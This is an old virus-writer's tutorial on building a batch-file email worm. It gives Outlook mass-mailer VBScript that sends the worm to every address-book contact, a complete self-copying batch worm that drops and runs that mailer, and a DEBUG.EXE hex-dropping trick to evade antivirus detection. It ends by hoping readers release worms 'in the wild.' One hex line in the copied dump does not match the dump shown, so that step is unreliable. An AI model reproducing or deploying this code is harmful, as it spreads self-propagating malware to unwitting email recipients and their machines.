Adding mass mailer vbscript code to a batch file This is my first time to write a tutorial.. It's lame but i hope you still read it.. I've searched the web for some batch worms and found only one that made a headline, the BAT/911 worm.. I searched the net for batch worm source code capable of attaching itself in email messages and found "none" :( .. looking at the bat archive of metaphase vx group only broke my heart (i saw only batch irc worms and file infectors).. I pondered.. Clock ticks and alas :) I think here's why... -------------------------------------------------------------------------------- *************************************** c:\>v.bat @echo off ctty nul echo on error resume next > c:\vvv.vbs <-----------*Problem* echo >> c:\vvv.vbs start c:\vvv.vbs *************************************** When you execute the code above, it'll spawn vvv.vbs and pops an error msg "Syntax Error" Let us examine the spawned vvv.vbs ******************* c:\>type c:\vvv.vbs ON ******************* question: Why i didn't get what i wanna get? answer: Coz ON is a parameter of echo ***************************************************************** C:\>echo/? Displays messages, or turns command-echoing on or off. ECHO [ON | OFF] ECHO [message] Type ECHO without parameters to display the current echo setting. ***************************************************************** To further demonstrate the problem, go to msdos prompt, type echo on error resume next, press enter and this is what you'll get.. c:\>echo on error resume next ON vvv.vbs won't run coz ON is not a valid vbs command.. And for a mass mailer vbscript to run smoothly, it must contain On Error Resume Next in the beginning of the code..I speculate that this problem is the reason why most batch file vxers abandoned the email attachment idea and settled for IRC script.ini DCC send. ********************************************** *Mass mailer VBScript Code.vbs (generic) on error resume next dim a,b,c,d,e set a = Wscript.CreateObject("Wscript.Shell") set b = CreateObject("Outlook.Application") set c = b.GetNameSpace("MAPI") for y = 1 To c.AddressLists.Count set d = c.AddressLists(y) x = 1 set e = b.CreateItem(0) for o = 1 To d.AddressEntries.Count f = d.AddressEntries(x) e.Recipients.Add f x = x + 1 next e.Subject = "your subject" e.Body = "your body" e.Attachments.Add ("worm attachment.bat") e.DeleteAfterSubmit = True e.Send f = "" next ********************************************** Solution to the problem, a dot.. Yeah, a fuckin' dot Here's a demo.. *************************************** c:\>v.bat @echo off ctty nul echo.on error resume next > c:\vvv.vbs <-----------*no problemo* echo >> c:\vvv.vbs start c:\vvv.vbs *************************************** execute v.bat you'll get no error msgs..:) examine c:\vvv.vbs ********************* c:\>type c:\vvv.vbs on error resume next ********************* For further demo, go to msdos prompt, type echo.on error resume next and this is what you'll get.. c:\>echo.on error resume next on error resume next {!} because of the dot, now ECHO doesn't consider ON as it's parameter.. :) that solves the problem.. now we're on our way to make a simple batch file worm using the GENERIC mass mailer vbscript code... ***************************************************************** c:\>copy con file.bat @echo off copy %0 c:\batch.bat echo.on error resume next > c:\X.vbs echo dim a,b,c,d,e >> c:\X.vbs echo set a = Wscript.CreateObject("Wscript.Shell") >> c:\X.vbs echo set b = CreateObject("Outlook.Application") >> c:\X.vbs echo set c = b.GetNameSpace("MAPI") >> c:\X.vbs echo for y = 1 To c.AddressLists.Count >> c:\X.vbs echo set d = c.AddressLists(y) >> c:\X.vbs echo x = 1 >> c:\X.vbs echo set e = b.CreateItem(0) >> c:\X.vbs echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs echo f = d.AddressEntries(x) >> c:\X.vbs echo e.Recipients.Add f >> c:\X.vbs echo x = x + 1 >> c:\X.vbs echo next >> c:\X.vbs echo e.Subject = "Hello!" >> c:\X.vbs echo e.Body = "Here's a fuckin' lame batch file worm" >> c:\X.vbs echo e.Attachments.Add ("c:\batch.bat") >> c:\X.vbs echo e.DeleteAfterSubmit = False >> c:\X.vbs echo e.Send >> c:\X.vbs echo f = "" >> c:\X.vbs echo next >> c:\X.vbs start c:\X.vbs exit ^Z ***************************************************************** The DrawBack of this technique is that AV will see our batchfile worm as "New VBS" or generic "VBS".. -------------------------------------------------------------------------------- Another way of adding VBScript routines to your batch file is by using DEBUG.EXE... I've adored Debug.Exe since the good old DOS days coz it can assemble small .COM program...I didn't have an access to TASM (until last monthh..:( ) then so I experimented with the debug, assembling programs which can destroy track 0 of diskettes, altering command.com to display "Starting MS-DOS" again and again, and other lame things.. Memories, memories, memories..Hah, enough with the nostalgia... Today, debug.exe is used by many virii and worms to drop mostly binary executables, sounds, images..good news coz this'll be another way for our batch file worm to drop a vbs mailer.. :) It'll be cooler coz AV won't able to see our batch file worm as a "New VBS".. DEMO: ******************************* c:\>type ourvbs.vbs on error resume next b = "Add my code to your batch" MsgBox b ******************************* We want to add code above in our batch file which will later be spawned as .vbs the process.. Go to MS-DOS prompt ******************** c:\>debug ourvbs.vbs - ******************** First thing we'll do is to get the size of ourvbs.vbs. type RCX, enter then enter.. ********************* c:\>debug ourvbs.vbs -rcx CX 003F : - ********************* CX 003F means that the size of the ourvbs.vbs is 003FH(hexadecimal) or 63 bytes. Computers always use hexadecimal (and binary) numbers in expressing numeric quantities. Now is not the right time to explain to you deeply what a hexadecimal number is... Consult an encyclopaedia.. Next, press d and enter... ************************************************************************************ c:\>debug ourvbs.vbs -rcx CX 003F : -d 158E:0100 6F 6E 20 65 72 72 6F 72-20 72 65 73 75 6D 65 20 on error resume 158E:0110 6E 65 78 74 0D 0A 62 20-3D 20 22 41 64 64 20 6D next..b = "Add m 158E:0120 79 20 63 6F 64 65 20 74-6F 20 79 6F 75 72 20 62 y code to your b 158E:0130 61 74 63 68 22 0D 0A 4D-73 67 42 6F 78 20 62 66 atch"..MsgBox bf 158E:0140 CF 32 E4 A3 9E 03 1F B8-01 2E CD 21 33 ED BE 0B .2.........!3... 158E:0150 00 81 C6 23 D8 8B 74 09-B3 2B BF 7B D4 E8 45 0B ...#..t..+.{..E. 158E:0160 F6 C7 01 75 F5 09 2E 89-CF F7 C5 04 00 75 0C 80 ...u.........u.. 158E:0170 3E 83 CF 00 74 05 C6 06-A7 D7 08 56 BE 7B D4 E8 >...t......V.{.. - ************************************************************************************ Whoa..What the hell was that? it's the hex dump of ourvbs.vbs.. Bit complicated? don't worry, we'll just concern ourselves with the pairs of numbers, the 6F, 6E etc.. These numbers represent the characters. Look at the right of the dump.. We can see the VBscript code that we want.. Mission: Our goal is to get the VBScript code from this hex dump.. Step 1. Add 100 to RCX.. in this case 0100 + 003F = 013F.. Step 2. The sum will make us decide what to get and what to discard... 0100 to sum will be considered.. In this case, 0100 to 013F.. ***************************************************************************************************** where the heck is 13F? 158E:0130 61 74 63 68 22 0D 0A 4D - 73 67 42 6F 78 20 62 66 <----013F 130 131 132 133 134 135 136 137 138 139 13A 13B 13C 13D 13E 13F ***************************************************************************************************** 3. Copy and paste.. ****************************************************************** 0100 6F 6E 20 65 72 72 6F 72-20 72 65 73 75 6D 65 20 0110 6E 65 78 74 0D 0A 62 20-3D 20 22 41 34 00 7D 15 0120 79 20 63 6F 64 65 20 74-6F 20 79 6F 75 72 20 62 0130 61 74 63 68 22 0D 0A 4D-73 67 42 6F 78 20 62 66 <----copy 0100 to 013F. discard 0140 above ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 0140 CF 32 E4 A3 9E 03 1F B8-01 2E CD 21 33 ED BE 0B discard 0150 00 81 C6 23 D8 8B 74 09-B3 2B BF 7B D4 E8 45 0B discard 0160 F6 C7 01 75 F5 09 2E 89-CF F7 C5 04 00 75 0C 80 discard 0170 3E 83 CF 00 74 05 C6 06-A7 D7 08 56 BE 7B D4 E8 discard ****************************************************************** Add selected dump to our batch file with additional add-ons..It's important to remove dashes between dumps ****************************************************************** c:\>copy con ourbatch.bat @echo off echo.e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>our echo.e 0110 6E 65 78 74 0D 0A 62 20 3D 20 22 41 34 00 7D 15>>our echo.e 0120 79 20 63 6F 64 65 20 74 6F 20 79 6F 75 72 20 62>>our echo.e 0130 61 74 63 68 22 0D 0A 4D 73 67 42 6F 78 20 62 66>>our ****************************************************************** we need to add this to complete the process ****************************************************************** echo.rcx>>our echo.[size of the vbscript code]>>our echo.n[name].vbs>>our echo.w>>our echo.q>>our debug < our start [name].vbs ****************************************************************** Whalla! Simple ei.. ****************************************************************** c:\>copy con ourbatch.bat @echo off echo.e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>our echo.e 0110 6E 65 78 74 0D 0A 62 20 3D 20 22 41 34 00 7D 15>>our echo.e 0120 79 20 63 6F 64 65 20 74 6F 20 79 6F 75 72 20 62>>our echo.e 0130 61 74 63 68 22 0D 0A 4D 73 67 42 6F 78 20 62 66>>our echo.rcx>>our echo.003F>>our echo.nourvbs.vbs>>our echo.w>>our echo.q>>our debug < our start ourvbs.vbs ^Z ****************************************************************** When ourbatch.bat is ran, a message box will pop out .. "Add my code to your batch".. Now i'm sure you'll be able to add a vbs mailer to your batch file worm using this technique..... so that's all.. I hope to see your batch worms in the wild..:) Alcopaul "Stuttering is not a crime..."